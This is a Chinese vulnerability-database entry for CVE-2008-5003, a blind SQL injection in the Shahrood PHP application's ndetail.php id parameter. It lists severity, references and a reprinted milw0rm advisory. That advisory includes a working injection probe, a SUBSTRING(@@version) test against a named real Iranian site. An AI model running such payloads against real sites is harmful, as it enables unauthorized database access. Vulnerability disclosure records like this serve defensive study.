Shahrood 'ndetail.php'SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1116586 漏洞类型 SQL注入
发布时间 2008-11-01 更新时间 2008-11-10
CVE编号 CVE-2008-5003 CNNVD-ID CNNVD-200811-157
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/6934
https://www.securityfocus.com/bid/80817
https://cxsecurity.com/issue/WLB-2008110090
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200811-157
|漏洞详情
Shahrood中的ndetail.php存在SQL注入漏洞。远程攻击者可以借助id参数,执行任意的SQL指令。
|漏洞EXP
========================================================

==> Shahrood (ndetail.php id) Blind SQL Injection Vulnerability

========================================================

==> AuThOr : BazOka-HaCkEr

==> EmaiL    : x9j@hotmail.com

==> HomE    :  www.TrYaG.cc/cc

========================================================

==> Product Page :

==> http://www.shahrood.net/

==> ExplO!te :

==> www.TarGeT.com/ndetail.php?id=[SQL]
 
==> Example :

==> www.shahvar.ir/ndetail.php?id=24+AND+SUBSTRING(@@version,1,1)=5

=========================================================

==> GreeTz :

==> FeezO , Abu-Mahdi , MoGaTiL , Mr.Al7rbi , Str0ke , TrYaG TeaM

=========================================================

# milw0rm.com [2008-11-01]
|受影响的产品
Shahrood Shahrood 0
|参考资料

来源:XF
名称:shahrood-ndetail-sql-injection(46295)
链接:http://xforce.iss.net/xforce/xfdb/46295
来源:MILW0RM
名称:6934
链接:http://www.milw0rm.com/exploits/6934
来源:VUPEN
名称:ADV-2008-2996
链接:http://www.frsirt.com/english/advisories/2008/2996
来源:SREASON
名称:4569
链接:http://securityreason.com/securityalert/4569